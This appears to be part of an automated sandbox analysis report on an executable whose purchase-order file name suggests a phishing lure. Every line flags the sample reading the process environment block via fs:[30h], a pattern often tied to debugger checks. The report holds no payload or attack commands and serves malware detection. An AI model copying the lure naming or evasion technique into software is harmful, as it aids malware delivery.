Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE5CF mov eax, dword ptr fs:[00000030h]	5_2_013FE5CF
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA430 mov eax, dword ptr fs:[00000030h]	5_2_013FA430
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147A456 mov eax, dword ptr fs:[00000030h]	5_2_0147A456
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE420 mov eax, dword ptr fs:[00000030h]	5_2_013BE420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE420 mov eax, dword ptr fs:[00000030h]	5_2_013BE420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE420 mov eax, dword ptr fs:[00000030h]	5_2_013BE420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BC427 mov eax, dword ptr fs:[00000030h]	5_2_013BC427
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144C460 mov ecx, dword ptr fs:[00000030h]	5_2_0144C460
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F8402 mov eax, dword ptr fs:[00000030h]	5_2_013F8402
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F8402 mov eax, dword ptr fs:[00000030h]	5_2_013F8402
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F8402 mov eax, dword ptr fs:[00000030h]	5_2_013F8402
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EA470 mov eax, dword ptr fs:[00000030h]	5_2_013EA470
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EA470 mov eax, dword ptr fs:[00000030h]	5_2_013EA470
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EA470 mov eax, dword ptr fs:[00000030h]	5_2_013EA470
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E245A mov eax, dword ptr fs:[00000030h]	5_2_013E245A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446420 mov eax, dword ptr fs:[00000030h]	5_2_01446420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B645D mov eax, dword ptr fs:[00000030h]	5_2_013B645D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE443 mov eax, dword ptr fs:[00000030h]	5_2_013FE443
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F44B0 mov ecx, dword ptr fs:[00000030h]	5_2_013F44B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C64AB mov eax, dword ptr fs:[00000030h]	5_2_013C64AB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C04E5 mov ecx, dword ptr fs:[00000030h]	5_2_013C04E5
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147A49A mov eax, dword ptr fs:[00000030h]	5_2_0147A49A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144A4B0 mov eax, dword ptr fs:[00000030h]	5_2_0144A4B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F273C mov eax, dword ptr fs:[00000030h]	5_2_013F273C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F273C mov ecx, dword ptr fs:[00000030h]	5_2_013F273C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F273C mov eax, dword ptr fs:[00000030h]	5_2_013F273C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402750 mov eax, dword ptr fs:[00000030h]	5_2_01402750
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402750 mov eax, dword ptr fs:[00000030h]	5_2_01402750
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01444755 mov eax, dword ptr fs:[00000030h]	5_2_01444755
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144E75D mov eax, dword ptr fs:[00000030h]	5_2_0144E75D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC720 mov eax, dword ptr fs:[00000030h]	5_2_013FC720
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC720 mov eax, dword ptr fs:[00000030h]	5_2_013FC720
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0710 mov eax, dword ptr fs:[00000030h]	5_2_013C0710
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F0710 mov eax, dword ptr fs:[00000030h]	5_2_013F0710
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC700 mov eax, dword ptr fs:[00000030h]	5_2_013FC700
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8770 mov eax, dword ptr fs:[00000030h]	5_2_013C8770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770 mov eax, dword ptr fs:[00000030h]	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0750 mov eax, dword ptr fs:[00000030h]	5_2_013C0750
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F674D mov esi, dword ptr fs:[00000030h]	5_2_013F674D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F674D mov eax, dword ptr fs:[00000030h]	5_2_013F674D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F674D mov eax, dword ptr fs:[00000030h]	5_2_013F674D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143C730 mov eax, dword ptr fs:[00000030h]	5_2_0143C730
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014407C3 mov eax, dword ptr fs:[00000030h]	5_2_014407C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C07AF mov eax, dword ptr fs:[00000030h]	5_2_013C07AF
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144E7E1 mov eax, dword ptr fs:[00000030h]	5_2_0144E7E1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C47FB mov eax, dword ptr fs:[00000030h]	5_2_013C47FB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C47FB mov eax, dword ptr fs:[00000030h]	5_2_013C47FB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146678E mov eax, dword ptr fs:[00000030h]	5_2_0146678E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E27ED mov eax, dword ptr fs:[00000030h]	5_2_013E27ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E27ED mov eax, dword ptr fs:[00000030h]	5_2_013E27ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E27ED mov eax, dword ptr fs:[00000030h]	5_2_013E27ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014747A0 mov eax, dword ptr fs:[00000030h]	5_2_014747A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CC7C0 mov eax, dword ptr fs:[00000030h]	5_2_013CC7C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C262C mov eax, dword ptr fs:[00000030h]	5_2_013C262C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE627 mov eax, dword ptr fs:[00000030h]	5_2_013DE627
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F6620 mov eax, dword ptr fs:[00000030h]	5_2_013F6620
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F8620 mov eax, dword ptr fs:[00000030h]	5_2_013F8620
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148866E mov eax, dword ptr fs:[00000030h]	5_2_0148866E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148866E mov eax, dword ptr fs:[00000030h]	5_2_0148866E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D260B mov eax, dword ptr fs:[00000030h]	5_2_013D260B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E609 mov eax, dword ptr fs:[00000030h]	5_2_0143E609
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F2674 mov eax, dword ptr fs:[00000030h]	5_2_013F2674
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402619 mov eax, dword ptr fs:[00000030h]	5_2_01402619
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA660 mov eax, dword ptr fs:[00000030h]	5_2_013FA660
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA660 mov eax, dword ptr fs:[00000030h]	5_2_013FA660
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DC640 mov eax, dword ptr fs:[00000030h]	5_2_013DC640
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F66B0 mov eax, dword ptr fs:[00000030h]	5_2_013F66B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC6A6 mov eax, dword ptr fs:[00000030h]	5_2_013FC6A6
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4690 mov eax, dword ptr fs:[00000030h]	5_2_013C4690
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4690 mov eax, dword ptr fs:[00000030h]	5_2_013C4690
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0143E6F2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0143E6F2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0143E6F2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0143E6F2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014406F1 mov eax, dword ptr fs:[00000030h]	5_2_014406F1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014406F1 mov eax, dword ptr fs:[00000030h]	5_2_014406F1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_013FA6C7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA6C7 mov eax, dword ptr fs:[00000030h]	5_2_013FA6C7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01440946 mov eax, dword ptr fs:[00000030h]	5_2_01440946
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B8918 mov eax, dword ptr fs:[00000030h]	5_2_013B8918
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B8918 mov eax, dword ptr fs:[00000030h]	5_2_013B8918
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0140096E mov eax, dword ptr fs:[00000030h]	5_2_0140096E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0140096E mov edx, dword ptr fs:[00000030h]	5_2_0140096E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0140096E mov eax, dword ptr fs:[00000030h]	5_2_0140096E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144C97C mov eax, dword ptr fs:[00000030h]	5_2_0144C97C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01464978 mov eax, dword ptr fs:[00000030h]	5_2_01464978
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01464978 mov eax, dword ptr fs:[00000030h]	5_2_01464978
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E908 mov eax, dword ptr fs:[00000030h]	5_2_0143E908
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E908 mov eax, dword ptr fs:[00000030h]	5_2_0143E908
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144C912 mov eax, dword ptr fs:[00000030h]	5_2_0144C912
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E6962 mov eax, dword ptr fs:[00000030h]	5_2_013E6962
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E6962 mov eax, dword ptr fs:[00000030h]	5_2_013E6962
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E6962 mov eax, dword ptr fs:[00000030h]	5_2_013E6962
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144892A mov eax, dword ptr fs:[00000030h]	5_2_0144892A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0145892B mov eax, dword ptr fs:[00000030h]	5_2_0145892B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014569C0 mov eax, dword ptr fs:[00000030h]	5_2_014569C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C09AD mov eax, dword ptr fs:[00000030h]	5_2_013C09AD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C09AD mov eax, dword ptr fs:[00000030h]	5_2_013C09AD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148A9D3 mov eax, dword ptr fs:[00000030h]	5_2_0148A9D3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0 mov eax, dword ptr fs:[00000030h]	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144E9E0 mov eax, dword ptr fs:[00000030h]	5_2_0144E9E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F29F9 mov eax, dword ptr fs:[00000030h]	5_2_013F29F9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F29F9 mov eax, dword ptr fs:[00000030h]	5_2_013F29F9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA9D0 mov eax, dword ptr fs:[00000030h]	5_2_013CA9D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F49D0 mov eax, dword ptr fs:[00000030h]	5_2_013F49D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014489B3 mov esi, dword ptr fs:[00000030h]	5_2_014489B3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014489B3 mov eax, dword ptr fs:[00000030h]	5_2_014489B3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014489B3 mov eax, dword ptr fs:[00000030h]	5_2_014489B3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov eax, dword ptr fs:[00000030h]	5_2_013E2835
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov eax, dword ptr fs:[00000030h]	5_2_013E2835
